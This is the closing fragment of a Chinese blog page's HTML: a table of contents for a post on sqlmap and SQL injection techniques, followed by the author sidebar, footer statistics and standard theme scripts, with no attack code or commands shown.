class="nav-number">1.7.5.</span> <span class="nav-text">WAF绕过</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#智能level测试等级"><span class="nav-number">1.7.6.</span> <span class="nav-text">智能level测试等级</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#基本信息收集的SQL语句"><span class="nav-number">1.7.7.</span> <span class="nav-text">基本信息收集的SQL语句</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#oracle"><span class="nav-number">1.7.7.1.</span> <span class="nav-text">oracle</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#mysql"><span class="nav-number">1.7.7.2.</span> <span class="nav-text">mysql</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Sqlserver"><span class="nav-number">1.7.7.3.</span> <span class="nav-text">Sqlserver</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Sqlmap盲注过程相关的函数及使用方法"><span class="nav-number">1.8.</span> <span class="nav-text">Sqlmap盲注过程相关的函数及使用方法</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#mid"><span class="nav-number">1.8.0.1.</span> <span class="nav-text">mid()</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#limit"><span class="nav-number">1.8.0.2.</span> <span class="nav-text">limit()</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#concat、concat-ws、group-concat"><span class="nav-number">1.8.0.3.</span> <span class="nav-text">concat、concat_ws、group_concat</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Count"><span class="nav-number">1.8.0.4.</span> <span class="nav-text">Count()</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#rand"><span class="nav-number">1.8.0.5.</span> <span class="nav-text">rand()</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#group-by"><span class="nav-number">1.8.0.6.</span> <span class="nav-text">group by</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#length"><span class="nav-number">1.8.0.7.</span> <span class="nav-text">length()</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Substr"><span class="nav-number">1.8.0.8.</span> <span class="nav-text">Substr()</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#Ascii"><span class="nav-number">1.8.0.9.</span> <span class="nav-text">Ascii()</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#参考资料"><span class="nav-number">1.9.</span> <span class="nav-text">参考资料</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Oslo"
      src="/images/avatar.jpg">
  <p class="site-author-name" itemprop="name">Oslo</p>
  <div class="site-description" itemprop="description">You guilty , You died</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">3</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
        <span class="site-state-item-count">3</span>
        <span class="site-state-item-name">分类</span>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">4</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>



      </div>

      <a href="/">
         <img class="site-author-image" itemprop="image"
       	src="/images/avatar.jpg"
       	alt="Oslo" />
      </a>
        <div class="back-to-top motion-element">
          <i class="fa fa-arrow-up"></i>
          <span>0%</span>
        </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Oslo</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-area-chart"></i>
    </span>
      <span class="post-meta-item-text">站点总字数：</span>
    <span title="站点总字数">35k</span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
      <span class="post-meta-item-text">站点阅读时长 &asymp;</span>
    <span title="站点阅读时长">32 分钟</span>
</div>

        
<div class="busuanzi-count">
  <script pjax async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/pjax/pjax.min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/lozad@1/dist/lozad.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>

  <script>
var pjax = new Pjax({
  selectors: [
    'head title',
    '#page-configurations',
    '.content-wrap',
    '.post-toc-wrap',
    '#pjax'
  ],
  switches: {
    '.post-toc-wrap': Pjax.switches.innerHTML
  },
  analytics: false,
  cacheBust: false,
  scrollTo : !CONFIG.bookmark.enable
});

window.addEventListener('pjax:success', () => {
  document.querySelectorAll('script[pjax], script#page-configurations, #pjax script').forEach(element => {
    var code = element.text || element.textContent || element.innerHTML || '';
    var parent = element.parentNode;
    parent.removeChild(element);
    var script = document.createElement('script');
    if (element.id) {
      script.id = element.id;
    }
    if (element.className) {
      script.className = element.className;
    }
    if (element.type) {
      script.type = element.type;
    }
    if (element.src) {
      script.src = element.src;
      // Force synchronous loading of peripheral JS.
      script.async = false;
    }
    if (element.getAttribute('pjax') !== null) {
      script.setAttribute('pjax', '');
    }
    if (code !== '') {
      script.appendChild(document.createTextNode(code));
    }
    parent.appendChild(script);
  });
  NexT.boot.refresh();
  // Define Motion Sequence & Bootstrap Motion.
  if (CONFIG.motion.enable) {
    NexT.motion.integrator
      .init()
      .add(NexT.motion.middleWares.subMenu)
      .add(NexT.motion.middleWares.postList)
      .bootstrap();
  }
  NexT.utils.updateSidebarPosition();
});
</script>


  <script defer src="/lib/three/three.min.js"></script>


  




  
<script src="/js/local-search.js"></script>













    <div id="pjax">
  

  

  

    </div>
</body>
</html>
